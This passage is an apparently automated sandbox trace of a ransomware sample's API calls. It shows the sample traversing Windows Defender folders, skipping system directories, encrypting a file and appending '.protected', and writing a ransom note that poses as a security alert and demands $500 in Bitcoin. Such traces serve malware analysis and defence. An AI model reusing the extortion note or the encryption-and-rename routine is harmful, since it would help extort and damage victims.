returned 1 [0071.602] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.602] lstrcmpiW (lpString1="LocalCopy", lpString2="Windows") returned -1 [0071.602] lstrcmpiW (lpString1="LocalCopy", lpString2="Program Files") returned -1 [0071.602] lstrcmpiW (lpString1="LocalCopy", lpString2="Program Files (x86)") returned -1 [0071.602] lstrcmpiW (lpString1="LocalCopy", lpString2="$Recycle.bin") returned 1 [0071.602] lstrcmpiW (lpString1="LocalCopy", lpString2="System Volume Information") returned -1 [0071.602] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy") returned 55 [0071.602] lstrcmpW (lpString1="LocalCopy", lpString2=".") returned 1 [0071.602] lstrcmpW (lpString1="LocalCopy", lpString2="..") returned 1 [0071.602] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\*") returned 57 [0071.602] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0071.602] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.602] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.602] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.602] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.602] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.602] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\.") returned 57 [0071.602] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.602] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.602] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.602] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.602] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.602] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.602] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.602] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\..") returned 58 [0071.602] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.602] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.602] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0071.602] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0071.603] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\RESTORE_FILES.txt") returned 73 [0071.603] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\LocalCopy\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows defender\\localcopy\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0071.604] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.604] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0071.604] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0071.604] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0071.604] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.604] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0071.604] CloseHandle (hObject=0xb4) returned 1 [0071.605] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.605] lstrcmpiW (lpString1="Quarantine", lpString2="Windows") returned -1 [0071.605] lstrcmpiW (lpString1="Quarantine", lpString2="Program Files") returned 1 [0071.605] lstrcmpiW (lpString1="Quarantine", lpString2="Program Files (x86)") returned 1 [0071.605] lstrcmpiW (lpString1="Quarantine", lpString2="$Recycle.bin") returned 1 [0071.605] lstrcmpiW (lpString1="Quarantine", lpString2="System Volume Information") returned -1 [0071.605] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine") returned 56 [0071.605] lstrcmpW (lpString1="Quarantine", lpString2=".") returned 1 [0071.605] lstrcmpW (lpString1="Quarantine", lpString2="..") returned 1 [0071.605] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\*") returned 58 [0071.605] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0071.605] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.605] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.605] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.605] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.605] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.605] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\.") returned 58 [0071.605] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.605] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.605] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.605] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.605] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.605] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.605] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.605] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\..") returned 59 [0071.605] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.605] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.605] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0071.610] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0071.610] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\RESTORE_FILES.txt") returned 74 [0071.610] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Quarantine\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows defender\\quarantine\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0071.610] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.610] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0071.613] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0071.613] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0071.614] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.614] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0071.614] CloseHandle (hObject=0xb4) returned 1 [0071.614] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.614] lstrcmpiW (lpString1="Scans", lpString2="Windows") returned -1 [0071.614] lstrcmpiW (lpString1="Scans", lpString2="Program Files") returned 1 [0071.614] lstrcmpiW (lpString1="Scans", lpString2="Program Files (x86)") returned 1 [0071.614] lstrcmpiW (lpString1="Scans", lpString2="$Recycle.bin") returned 1 [0071.614] lstrcmpiW (lpString1="Scans", lpString2="System Volume Information") returned -1 [0071.614] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans") returned 51 [0071.614] lstrcmpW (lpString1="Scans", lpString2=".") returned 1 [0071.614] lstrcmpW (lpString1="Scans", lpString2="..") returned 1 [0071.614] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\*") returned 53 [0071.614] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0071.615] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.615] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.615] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.615] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.615] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.616] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\.") returned 53 [0071.616] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.616] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.616] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.616] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.616] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.616] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.616] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.616] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\..") returned 54 [0071.616] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.616] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.616] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.616] lstrcmpiW (lpString1="History", lpString2="Windows") returned -1 [0071.616] lstrcmpiW (lpString1="History", lpString2="Program Files") returned -1 [0071.616] lstrcmpiW (lpString1="History", lpString2="Program Files (x86)") returned -1 [0071.616] lstrcmpiW (lpString1="History", lpString2="$Recycle.bin") returned 1 [0071.616] lstrcmpiW (lpString1="History", lpString2="System Volume Information") returned -1 [0071.616] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History") returned 59 [0071.616] lstrcmpW (lpString1="History", lpString2=".") returned 1 [0071.616] lstrcmpW (lpString1="History", lpString2="..") returned 1 [0071.616] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*") returned 61 [0071.616] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0071.616] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.616] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.616] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.616] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.616] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.616] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\.") returned 61 [0071.616] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.616] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0071.616] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.616] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.616] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.617] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.617] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.617] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\..") returned 62 [0071.617] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.617] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.617] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0071.617] lstrcmpiW (lpString1="CacheManager", lpString2="Windows") returned -1 [0071.617] lstrcmpiW (lpString1="CacheManager", lpString2="Program Files") returned -1 [0071.617] lstrcmpiW (lpString1="CacheManager", lpString2="Program Files (x86)") returned -1 [0071.617] lstrcmpiW (lpString1="CacheManager", lpString2="$Recycle.bin") returned 1 [0071.617] lstrcmpiW (lpString1="CacheManager", lpString2="System Volume Information") returned -1 [0071.617] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager") returned 72 [0071.617] lstrcmpW (lpString1="CacheManager", lpString2=".") returned 1 [0071.617] lstrcmpW (lpString1="CacheManager", lpString2="..") returned 1 [0071.617] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*") returned 74 [0071.617] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x4a9210 [0071.617] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.617] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.617] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.617] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.617] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.617] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\.") returned 74 [0071.617] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.617] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0071.617] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.617] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.617] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.617] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.617] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.617] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\..") returned 75 [0071.617] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.617] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.617] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0071.617] lstrcmpiW (lpString1="MpSfc.bin", lpString2="Windows") returned -1 [0071.618] lstrcmpiW (lpString1="MpSfc.bin", lpString2="Program Files") returned -1 [0071.618] lstrcmpiW (lpString1="MpSfc.bin", lpString2="Program Files (x86)") returned -1 [0071.618] lstrcmpiW (lpString1="MpSfc.bin", lpString2="$Recycle.bin") returned 1 [0071.618] lstrcmpiW (lpString1="MpSfc.bin", lpString2="System Volume Information") returned -1 [0071.618] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin") returned 82 [0071.618] StrStrIW (lpFirst="MpSfc.bin", lpSrch=".protected") returned 0x0 [0071.618] lstrcmpW (lpString1="MpSfc.bin", lpString2="RESTORE_FILES.txt") returned -1 [0071.618] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0071.618] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0071.618] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\cachemanager\\mpsfc.bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0071.618] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin") returned 82 [0071.618] StrStrW (lpFirst="MpSfc.bin", lpSrch=".txt") returned 0x0 [0071.618] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin") returned 82 [0071.618] StrStrW (lpFirst="MpSfc.bin", lpSrch=".rar") returned 0x0 [0071.618] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin") returned 82 [0071.618] StrStrW (lpFirst="MpSfc.bin", lpSrch=".zip") returned 0x0 [0071.618] ReadFile (in: hFile=0x14c, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0071.625] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.625] WriteFile (in: hFile=0x14c, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0071.625] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.625] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0071.643] WriteFile (in: hFile=0x14c, lpBuffer=0x4a9250*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a9250*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0071.643] CloseHandle (hObject=0x14c) returned 1 [0071.643] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin.protected") returned 92 [0071.643] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\cachemanager\\mpsfc.bin"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\MpSfc.bin.protected" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\cachemanager\\mpsfc.bin.protected")) returned 1 [0071.644] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0071.644] FindClose (in: hFindFile=0x4a9210 | out: hFindFile=0x4a9210) returned 1 [0071.644] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\RESTORE_FILES.txt") returned 90 [0071.644] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\cachemanager\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0071.646] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and 